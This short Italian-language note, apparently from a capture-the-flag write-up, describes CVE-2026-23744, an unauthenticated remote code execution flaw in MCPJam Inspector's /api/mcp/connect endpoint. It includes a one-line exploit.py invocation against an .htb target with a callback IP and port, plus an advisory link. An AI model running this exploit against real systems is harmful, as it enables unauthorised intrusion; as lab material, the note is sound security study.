
# Esecuzione di codice remoto su MCPJam Inspector <= 1.4.2
CVE-2026-23744 è una vulnerabilità critica in MCPJam Inspector (versioni <= 1.4.2) che consente l'esecuzione di codice remoto (RCE) non autenticata. Il difetto esiste perché il server API interno dell'applicazione si lega a tutte le interfacce di rete (0.0.0.0) per impostazione predefinita e manca di autorizzazione sull'endpoint /api/mcp/connect. Un attaccante può inviare un payload JSON appositamente predisposto a questo endpoint per eseguire comandi arbitrari con i privilegi dell'utente che esegue Inspector.

python3 exploit.py https://mpc.kobold.htb <IP> <PORT>
https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6